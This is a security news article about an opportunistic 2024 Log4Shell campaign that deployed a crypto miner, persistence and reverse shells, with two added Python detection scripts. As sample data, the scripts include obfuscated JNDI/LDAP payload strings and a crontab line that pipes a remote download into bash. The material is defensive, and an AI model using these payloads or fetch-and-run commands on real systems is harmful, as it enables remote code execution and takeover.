The Log4j vulnerability, also known as Log4Shell, has been exploited in recent attacks through obfuscated LDAP requests, resulting in the execution of malicious scripts that establish persistence, gather system information, and exfiltrate data. These attacks highlight the ongoing threat posed by this vulnerability, as attackers continue to exploit it to maintain control over compromised systems and evade detection.
Discovered in November 2021, the Log4Shell vulnerability in the Apache Log4j library has a CVSS score of 10, making it a critical security issue that allows attackers to remotely execute arbitrary code. Due to the widespread use of Log4j, it has become a prime target for exploitation by various threat actors, including nation-state groups and cybercriminals. Groups like APT41 and Conti have incorporated Log4Shell exploits into their operations, underscoring the significant impact of this vulnerability on global cybersecurity.
On July 30, 2024, a Confluence honeypot detected an attempt to exploit the Log4Shell vulnerability from a known Tor exit node, marking the beginning of an opportunistic campaign. The attackers leveraged the vulnerability to deploy XMRig, a cryptocurrency mining software, on compromised systems, showcasing the ongoing threat posed by opportunistic threat actors who exploit vulnerabilities for malicious purposes.
In one specific attack scenario, an attacker exploited the Log4j vulnerability using a cleverly obfuscated payload containing an LDAP URL, triggering the execution of a malicious Java class from a remote server on the vulnerable Java application. This class downloaded a secondary script (“lte”) from another server and executed it with root privileges, highlighting the potential for further malicious activity due to its ability to run arbitrary commands.
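The obfuscation described above works because Log4j evaluates lookups from the inside out, so a payload can spell out the JNDI lookup from fragments that only resolve to the final string at runtime. As an added example (this is not code from the original article or from Datadog), the Python scanner below applies the same inside-out evaluation to log lines before matching, so the usual nesting tricks do not hide the lookup from a defender's search. The regular expressions, function names and the sample access-log lines are constructed for the example; the hosts use the reserved `.invalid` domain.

```python
import re
from urllib.parse import unquote

# Added example (not from the original article or Datadog): a log-line scanner that
# undoes nested-lookup obfuscation around "${jndi:...}" and flags what remains.
# The sample log lines at the bottom are constructed, not captured traffic.

# An innermost Log4j lookup: "${...}" with no further "${" inside the braces.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup, matched case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j 2.x would, for detection purposes."""
    prefix, _, rest = body.partition(":")
    p = prefix.strip().lower()
    if p == "lower":
        return rest.lower()
    if p == "upper":
        return rest.upper()
    # "${name:-default}" yields the default when "name" is undefined. Assume undefined,
    # which is exactly what forms such as "${::-j}" or "${env:X:-j}" rely on.
    if ":-" in body:
        return body.partition(":-")[2]
    # Any other lookup is left untouched so the loop below terminates.
    return "${" + body + "}"


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """URL-decode once, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = LOOKUP.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is removed."""
    return JNDI.search(normalize_lookups(text)) is not None


def scan_log(lines):
    """Return the indices of log lines that carry a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed sample access-log lines: one benign, one plain, two obfuscated.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /login?user=alice HTTP/1.1" 200',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://ldap.example.invalid/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://ldap.example.invalid/a}"',
    '198.51.100.7 - - "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fldap.example.invalid%2Fa%7D HTTP/1.1" 404',
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print(f"line {i}: {normalize_lookups(SAMPLE_LOG[i])}")
```

The normalizer only models the `lower`, `upper` and default-value forms, which is what public detection rules for this vulnerability cover; it URL-decodes a single time, so double-encoded requests should be decoded once more before scanning. Detection of this kind is a backstop: the actual fix is upgrading Log4j past the affected 2.x releases (or removing the JndiLookup class where upgrading is impossible).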
The malicious Java class then downloaded an obfuscated Bash script from a remote server, which conducted system reconnaissance, downloaded and configured a cryptocurrency miner, established persistence using systemd or cron jobs, and set up reverse shells for remote control. Comprehensive system information, including CPU details, OS version, user data, network connections, group memberships, running processes, and system uptime, was gathered and transmitted to a remote server via an HTTP POST request.
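Persistence through cron or systemd is where a responder can still catch this campaign after the initial exploitation has scrolled out of the application logs. As an added example, not part of the original article or of Datadog's research, the Python audit below scans user-crontab text and systemd unit text for the two traits the described script leaves behind: commands that run out of world-writable temp directories, and commands that fetch a remote script and pipe it straight into a shell. The heuristics, function names and sample entries are constructed for the example; the `.invalid` host stands in for whatever download server an incident would show.

```python
import re
from dataclasses import dataclass

# Added example (not from the original article or Datadog): audit crontab and systemd
# unit contents for persistence patterns. All sample inputs below are constructed.

TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# A download piped straight into a shell, e.g. "curl ... | bash".
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")
# A base64-decoded blob piped into a shell.
DECODE_PIPE = re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(ba)?sh\b")
# systemd keys whose value is a command line.
EXEC_KEYS = {"ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload"}


@dataclass
class Finding:
    source: str
    command: str
    reason: str


def check_command(source: str, cmd: str) -> list:
    """Apply every heuristic to one command line and collect the hits."""
    findings = []
    if any(d in cmd for d in TEMP_DIRS):
        findings.append(Finding(source, cmd, "runs from a world-writable temp directory"))
    if FETCH_PIPE.search(cmd):
        findings.append(Finding(source, cmd, "pipes a download straight into a shell"))
    if DECODE_PIPE.search(cmd):
        findings.append(Finding(source, cmd, "pipes a base64-decoded blob into a shell"))
    return findings


def audit_crontab(text: str) -> list:
    """Audit user-crontab format (five time fields, then the command; no user column)."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):          # @reboot, @hourly, ...
            fields = line.split(None, 1)
            cmd = fields[1] if len(fields) == 2 else ""
        else:                             # minute hour dom month dow command
            fields = line.split(None, 5)
            cmd = fields[5] if len(fields) == 6 else ""
        findings += check_command("crontab", cmd)
    return findings


def audit_systemd_unit(name: str, text: str) -> list:
    """Audit the Exec* lines of one unit file."""
    findings = []
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition("=")
        if sep and key.strip() in EXEC_KEYS:
            findings += check_command(f"systemd:{name}", value.strip())
    return findings


# Constructed sample inputs: a benign logrotate job next to two suspicious entries,
# and a unit file whose ExecStart runs from /dev/shm.
SAMPLE_CRONTAB = """\
# constructed sample, not from a real host
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.hidden/miner >/dev/null 2>&1
@reboot curl -fsSL http://download-host.invalid/lte | bash
"""

SAMPLE_UNIT = """\
[Unit]
Description=System update helper
[Service]
ExecStart=/bin/bash -c "/dev/shm/.x/run.sh"
Restart=always
[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB) + audit_systemd_unit("helper.service", SAMPLE_UNIT):
        print(f"{f.source}: {f.reason}: {f.command}")
```

On a live host the inputs come from `crontab -l` for each user, the files under `/etc/cron.d` (which carry an extra user column this parser does not handle) and the unit files under `/etc/systemd/system` and `~/.config/systemd/user`; treat a hit as a lead to verify, since legitimate software occasionally uses temp directories too.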
To evade detection, the script self-destructed and cleared its tracks by overwriting the bash history file and erasing the current shell’s command history. Datadog’s investigation into the exploitation attempts yielded several indicators of compromise, including suspicious IP addresses and domain names as well as suspicious file paths on the compromised system.
Overall, the Log4Shell vulnerability continues to be a significant cybersecurity threat, with attackers exploiting it to carry out various malicious activities and evade detection. Organizations must remain vigilant and implement appropriate security measures to protect against the risks associated with this critical flaw in the Apache Log4j library.